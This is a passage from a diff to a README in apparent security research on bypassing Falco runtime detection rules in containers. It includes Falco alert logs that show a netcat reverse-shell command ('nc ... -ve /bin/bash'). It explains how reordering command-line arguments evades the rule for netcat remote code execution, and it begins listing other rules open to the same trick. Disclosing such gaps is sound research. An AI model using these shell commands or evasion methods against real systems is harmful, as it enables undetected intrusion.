blackberry/Falco-bypasses/README.md

 19:52:03.184973672: Notice Network tool launched in container (user=root user_loginuid=-1 command=nc 172.17.0.1 443 -ve /bin/bash parent_process=bash container_id=7917d5e18fd8 container_name=sleepy_mcclintock image=sshayb/fuber:latest) k8s.ns=<NA> k8s.pod=<NA> container=7917d5e18fd8 k8s.ns=<NA> k8s.pod=<NA> container=7917d5e18fd8
 19:52:03.235157399: Warning Redirect stdout/stdin to network connection (user=root user_loginuid=-1 k8s.ns=<NA> k8s.pod=<NA> container=7917d5e18fd8 process=nc parent=bash cmdline=nc 172.17.0.1 443 -ve /bin/bash terminal=34816 container_id=7917d5e18fd8 image=sshayb/fuber fd.name=172.17.0.2:50084->172.17.0.1:443 fd.num=0 fd.type=ipv4 fd.sip=172.17.0.1) k8s.ns=<NA> k8s.pod=<NA> container=7917d5e18fd8
 ```
 Even though Falco emits two events, the first rule is different now, which means we successfully bypassed **Netcat Remote Code Execution in Container**.
 Rule **Launch Suspicious Network Tool in Container** is of NOTICE priority (detection downgrade), relies on _proc.name_ comparison in `network_tool_binaries` list, and is therefore bypassable through traditional means.
 Among other things, this exercise points on Falco's correct logic to report the higher-priority event if multiple rules trigger as a result of the same call.
-But in the context of this discussion the more important point is having another evasion technique on hands through collation of the command line arguments.
+But in the context of this discussion, the more important point is having another evasion technique on hand through collation of the command line arguments.

 To understand how common the usage of command line parameters in the default ruleset is and whether we can use this technique to evade other rules we search for _proc.args_ constructs.
 There are four other rules that use _proc.args_ command in a meaningful way:
 1. **Search Private Keys or Passwords**